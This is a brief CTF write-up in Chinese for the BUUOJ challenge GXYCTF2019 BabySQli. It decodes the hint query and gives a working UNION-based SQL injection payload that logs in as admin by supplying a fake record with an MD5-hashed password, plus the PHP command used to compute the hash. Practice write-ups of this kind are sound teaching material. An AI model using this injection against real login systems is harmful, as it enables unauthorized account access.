https://buuoj.cn/challenges#[GXYCTF2019]BabySQli
登陆类注入,有过滤
这是一段base32
解码后是base64
再解一次得到
select * from user where username = '$name'
Trick
- 使用联合查询构造虚拟查询记录进行登录
这里有个小坑,原题应该是有对密码进行了md5
加密后存储的,但是这里没有提示
PS C:\Users\Administrator> php -r "var_dump(md5('mochu7'));"
string(32) "874a0300d72a3676c4413ce52454eff7"
name=mochu7'union select 1,'admin','874a0300d72a3676c4413ce52454eff7'#&pw=mochu7